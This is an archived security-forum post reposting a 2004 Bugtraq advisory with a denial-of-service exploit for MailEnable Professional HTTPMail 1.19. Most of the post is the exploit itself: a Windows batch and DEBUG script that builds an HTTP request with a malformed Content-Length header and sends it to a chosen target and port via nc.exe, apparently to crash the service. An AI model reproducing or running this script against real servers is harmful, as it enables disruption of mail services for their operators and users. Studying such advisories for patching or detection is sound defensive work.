Dos@mehttps

GovernmentSecurity.org > The Archives > Exploit Articles

qcred11

Aug 2 2004, 11:24 PM

QUOTE

:Application: MailEnable Professional HTTPMail
:Vendors: http://www.mailenable.com/
:Version: 1.19
:Platforms: Windows
:Bug: D.O.S
:Date: 2004-07-30
:Author: CoolICE
:E_mail: CoolICE#China.com
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
@echo off
;if '%1'=='' echo Usage:%0 target [port]&&goto :eof
;set PORT=8080
;if not '%2'=='' set PORT=%2
;for %%n in (nc.exe) do if not exist %%~$PATH:n if not exist nc.exe
echo Need nc.exe&&goto :eof
;DEBUG < %~s0
;GOTO :run

e 100 "GET / HTTP/1.0" 0D 0A "Content-Length: "
!DOS_at_length>0x64
f 120 183 39
e 184 "XXXX" 0d 0a 0d 0a
rcx
8c
nhttp.tmp
w
q

:run
nc %1 %PORT% < http.tmp
del http.tmp

Source: http://seclists.org/lists/bugtraq/2004/Aug/0012.html

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.